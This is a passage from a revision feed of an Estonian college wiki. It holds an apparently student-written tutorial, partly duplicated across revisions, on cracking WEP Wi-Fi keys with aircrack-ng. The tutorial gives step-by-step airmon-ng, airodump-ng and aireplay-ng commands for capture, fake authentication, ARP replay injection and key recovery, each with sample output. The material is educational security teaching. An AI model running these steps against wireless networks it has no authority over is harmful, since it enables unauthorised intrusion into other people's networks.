&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89362</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89362"/>
		<updated>2015-05-26T08:57:14Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Sissejuhatus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
==Üldkirjeldus==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
